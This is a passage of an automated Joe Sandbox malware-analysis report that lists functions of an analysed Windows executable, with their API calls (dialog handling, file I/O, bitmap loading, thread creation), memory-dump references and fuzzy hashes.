Part of subcall function 00007FF64D348624: GlobalAlloc.KERNELBASE ref: 00007FF64D3486A6
Part of subcall function 00007FF64D348624: GlobalLock.KERNEL32 ref: 00007FF64D3486BB
Part of subcall function 00007FF64D348624: GdipAlloc.GDIPLUS ref: 00007FF64D3486FE
Part of subcall function 00007FF64D348624: GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF64D348769
Part of subcall function 00007FF64D348624: GlobalUnlock.KERNEL32 ref: 00007FF64D34878C
Part of subcall function 00007FF64D348624: GlobalFree.KERNEL32 ref: 00007FF64D348795

Strings

], xrefs: 00007FF64D34B063

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
String ID: ]
API String ID: 2347093688-3352871620
Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
Instruction ID: dde25e3c37cd58948f2c3ad44cf5062b05473753e70c1cd28c1adca3831154e5
Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
Instruction Fuzzy Hash: 94118621F0D64242FA66FB22A654379D3D1AF8ABC1F080474DD5D87B95FF2EE8058B00

Function 00007FF64D34AE1C Relevance: 7.5, APIs: 5, Instructions: 27
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32 ref: 00007FF64D34AE32
GetMessageW.USER32 ref: 00007FF64D34AE49
IsDialogMessageW.USER32 ref: 00007FF64D34AE60
TranslateMessage.USER32 ref: 00007FF64D34AE6F
DispatchMessageW.USER32 ref: 00007FF64D34AE7A

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
Instruction ID: 51eb40356dfc1cab3200bb088c376030af62d74139c22229fca4b05603ea2b02
Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
Instruction Fuzzy Hash: D1F0EC25F3C55282FB51BB20E895A36A3A1BFD2B05F845431F54ED2854EF2DD508CB00

Function 00007FF64D3491E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32 ref: 00007FF64D349211
SHAutoComplete.SHLWAPI ref: 00007FF64D349255

Part of subcall function 00007FF64D3413C4: CompareStringW.KERNEL32 ref: 00007FF64D3413E3

FindWindowExW.USER32 ref: 00007FF64D34923F

Strings

EDIT, xrefs: 00007FF64D34921B, 00007FF64D349233

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
Instruction ID: 47cfc7c45387346340ee6b3b41b322d8f6e0f3ac952ddc38675a669a5417256e
Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
Instruction Fuzzy Hash: 3F011D61F1CA4782FA22BB21E8207B6A390AF9B785F481035C94DC6655FE2DE549C750

Function 00007FF64D332CE0 Relevance: 6.1, APIs: 4, Instructions: 136
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(00007FF64D338C9A), ref: 00007FF64D332D22
WriteFile.KERNEL32 ref: 00007FF64D332D6C
WriteFile.KERNELBASE ref: 00007FF64D332D9A

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 759593f06e971a5af3dff942057e3884964648b854c35b3f90eb8150d1d2c130
Instruction ID: d43491741b409f37429e31ac545691bd6e2cf7cb8883a52dfa68226b2a716236
Opcode Fuzzy Hash: 759593f06e971a5af3dff942057e3884964648b854c35b3f90eb8150d1d2c130
Instruction Fuzzy Hash: B4511366F1EA4292EA22FB25D94477AA360FF46B94F041131EA4D86AD4FF3CE485C300

Function 00007FF64D3503E0 Relevance: 6.1, APIs: 4, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetDlgItemTextW.USER32 ref: 00007FF64D350556
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D3505C1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D3505C7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D3505CD

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ItemText
String ID:
API String ID: 3750147219-0
Opcode ID: f6b19c5786641239495edb38a692ba8cfa3517dae24bead12263da06daead65f
Instruction ID: c3fa6f5b805bff9fb7984f5bccd1e0f73bae7eec78f87c7c648b81b58d1a0988
Opcode Fuzzy Hash: f6b19c5786641239495edb38a692ba8cfa3517dae24bead12263da06daead65f
Instruction Fuzzy Hash: 1251D1A2F1C65284FF02BFA5D8542ADA362BF46BA4F400635DA2D97BD5EF6DD040C300

Function 00007FF64D333684 Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,00000000,?,00007FF64D33309D), ref: 00007FF64D3336CE
CreateDirectoryW.KERNEL32 ref: 00007FF64D333733
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FF64D33309D), ref: 00007FF64D333791
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D3337CE

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2359106489-0
Opcode ID: 5cda4ea00785afd89f4b2a0283e369f756aeb3863be6a65230e4b36aaec5c4cf
Instruction ID: 8a28c77b2c3094786badcc54e7b58b7625bb6b8e092b02281fafe2f29341b8a8
Opcode Fuzzy Hash: 5cda4ea00785afd89f4b2a0283e369f756aeb3863be6a65230e4b36aaec5c4cf
Instruction Fuzzy Hash: 2731C662E0C68241EE62BB25A64427DE361FF8A7A0F548231EE9DC3BD5EF3CD4458600

Function 00007FF64D352D6C Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF64D352D7B

Part of subcall function 00007FF64D3527FC: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF64D35281E

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF64D352D90
__scrt_release_startup_lock.LIBCMT ref: 00007FF64D352DFE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF64D352E51

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 1452418845-0
Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
Instruction ID: f57888eb1a3b3f75d389b37e7306c531d8dab6717466279956c842b06e4224bb
Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
Instruction Fuzzy Hash: 5C311A25E0D10341FA67FB65D4713BAA391AF47788F485434EA4ECB2D3FE2CA804C251

Function 00007FF64D360B78 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF64D35C45B), ref: 00007FF64D360B91
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF64D35C45B), ref: 00007FF64D360BF3
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF64D35C45B), ref: 00007FF64D360C2D
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF64D35C45B), ref: 00007FF64D360C57

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 1557788787-0
Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
Instruction ID: e079e63d4cb1b19619b3c99f621be9a49bab8d75e9ccda76d5a6a9f2848f52c5
Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
Instruction Fuzzy Hash: 78213E21F1CB9181E675BF12A44102DE6A4FB9ABD0B485134DE9EA7BE4EF3CE4528704

Function 00007FF64D332320 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,?,00000000,00007FF64D332927,?,00100000,?,00000001,00000000,00000000,?,00007FF64D3314C1), ref: 00007FF64D332348
ReadFile.KERNELBASE ref: 00007FF64D332367
GetLastError.KERNEL32 ref: 00007FF64D33239B
GetLastError.KERNEL32 ref: 00007FF64D3323BA

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
Instruction ID: 874b801092155f2ec19d4f80623a166ace4aee2dc669e1ee2ddd37987a907b73
Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
Instruction Fuzzy Hash: 95219225E0C65281EA66FB11A50033DE3A0FF47BA4F144530DA5DCEA88EF7CD8858711

Function 00007FF64D33E948 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF64D33ECD8: ResetEvent.KERNEL32 ref: 00007FF64D33ECF1
Part of subcall function 00007FF64D33ECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF64D33ED07

ReleaseSemaphore.KERNEL32 ref: 00007FF64D33E974
FindCloseChangeNotification.KERNELBASE ref: 00007FF64D33E993
DeleteCriticalSection.KERNEL32 ref: 00007FF64D33E9AA
CloseHandle.KERNEL32 ref: 00007FF64D33E9B7

Part of subcall function 00007FF64D33EA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF64D33E95F,?,?,?,00007FF64D33463A,?,?,?), ref: 00007FF64D33EA63
Part of subcall function 00007FF64D33EA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF64D33E95F,?,?,?,00007FF64D33463A,?,?,?), ref: 00007FF64D33EA6E

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
String ID:
API String ID: 2143293610-0
Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
Instruction ID: 69582f0f0566e10b378b71dca4f5950df257375d7b112ed057dd75fd449d69eb
Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
Instruction Fuzzy Hash: 88012D32E18A81A3E659BB21E54426DA330FB89B80F005131DB6D93665DF39E4B4C740

Function 00007FF64D33EAA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00007FF64D33EAE0
SetThreadPriority.KERNEL32 ref: 00007FF64D33EB36

Strings

CreateThread failed, xrefs: 00007FF64D33EAEE

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: Thread$CreatePriority
String ID: CreateThread failed
API String ID: 2610526550-3849766595
Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
Instruction ID: 17c2d8a895d0875e64cde1f56773943b839c8072d67c0885f1153fc8601dc94a
Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
Instruction Fuzzy Hash: 12114F31E0CA4281EB12FB15E9412AAF361FB85798F544231EA4E82A69FF7CE595C740

Function 00007FF64D34946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF64D33DFD0: GetSystemDirectoryW.KERNEL32 ref: 00007FF64D33DDDF

OleInitialize.OLE32 ref: 00007FF64D349486
SHGetMalloc.SHELL32 ref: 00007FF64D3494D4

Strings

riched20.dll, xrefs: 00007FF64D349475

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: DirectoryInitializeMallocSystem
String ID: riched20.dll
API String ID: 174490985-3360196438
Opcode ID: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
Instruction ID: fce47693aea1c9d89ebb79a7059bb93a88f9565b38891c59e99195dca2acedb4
Opcode Fuzzy Hash: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
Instruction Fuzzy Hash: B2F03C71A1CA8182EB12BF20F4151AAB3A0FB89754F400135E98DC2A54EF7CE159CB00

Function 00007FF64D34095C Relevance: 4.7, APIs: 3, Instructions: 152windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF64D34853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF64D34856C

Part of subcall function 00007FF64D33AAE0: LoadStringW.USER32 ref: 00007FF64D33AB67
Part of subcall function 00007FF64D33AAE0: LoadStringW.USER32 ref: 00007FF64D33AB80

Part of subcall function 00007FF64D321FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D321FFB

Part of subcall function 00007FF64D32129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64D321396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D3501BB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D3501C1
SendDlgItemMessageW.USER32 ref: 00007FF64D3501F2

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
String ID:
API String ID: 3106221260-0
Opcode ID: f7a8a175be1daf3eca109b687688224756fee905e724f508e14b940bc333b7d5
Instruction ID: b9812b4874ca528098fb10a8f7f5cd0cffdbef97cd38a9a31d2964ab4141930f
Opcode Fuzzy Hash: f7a8a175be1daf3eca109b687688224756fee905e724f508e14b940bc333b7d5
Instruction Fuzzy Hash: 8B51A662F0D64296FB11BBA5D4552FDA362AB86BC8F404135DE1D97BDAFE2CE500C340

Function 00007FF64D332134 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007FF64D3321CF
CreateFileW.KERNEL32 ref: 00007FF64D33223C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D3322D8

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: CreateFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2272807158-0
Opcode ID: 650906bb36444c59f78769edd7e70a31dc34f49dc41decdeb4024168be9b1e6b
Instruction ID: aee3df81a32e500b5c351776184122c3af9d3b54a208e168e5ec3f3eacae62d7
Opcode Fuzzy Hash: 650906bb36444c59f78769edd7e70a31dc34f49dc41decdeb4024168be9b1e6b
Instruction Fuzzy Hash: 4441C166E0C68182EB61EB15E544269A3A0FB867B4F505734DFAD83AD5EF3CE490C700

Function 00007FF64D3223F8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32 ref: 00007FF64D32243E
GetWindowTextW.USER32 ref: 00007FF64D322476
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D322505

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2176759853-0
Opcode ID: 1bf85210b9a87779fb11811f9a7e2f8ba75c636e64e4f9da94f36f1c7ff0fb34
Instruction ID: c4948d4e1ae5817beab3878dd7e0d36e2ecdaf5481f086ccc02621724946821a
Opcode Fuzzy Hash: 1bf85210b9a87779fb11811f9a7e2f8ba75c636e64e4f9da94f36f1c7ff0fb34
Instruction Fuzzy Hash: 8C217162E1CB8581EA11FB65A84017AE3A5FB8ABD0F145235EBDD43B95EF3CD1908740

Function 00007FF64D341F94 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF64D34205B
